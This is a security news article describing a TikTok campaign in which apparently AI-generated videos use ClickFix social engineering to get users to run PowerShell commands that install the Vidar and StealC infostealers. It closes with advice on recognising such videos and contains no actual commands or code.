In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks.
The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned “Boost Your Spotify Experience Instantly — Here's How!” and has nearly half a million views.
These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware.
TikTok's engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok's trending “Invisible Challenge” to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying “activation” deposits using Bitcoin.
How TikTok ClickFix attacks work
ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to “fix” the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too.
What do you think so far?
In the current TikTok campaign, the instructional videos prompt users to run a PowerShell command that installs Vidar or StealC information-stealing malware. The former can take desktop screenshots and harvest data ranging from login credentials and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets. Once run, the script will download a second PowerShell script allowing it to launch automatically upon device startup. It also saves in a hidden directory and deletes temporary folders so it can evade detection.
How to spot malicious TikTok videos
Be wary of following instructional videos you're served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with those that are legitimate, like from the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. There's no malicious code actually embedded in or delivered by these instructional videos—the scheme is dependent on social engineering via verbal directions—making the threat technically harder to detect.
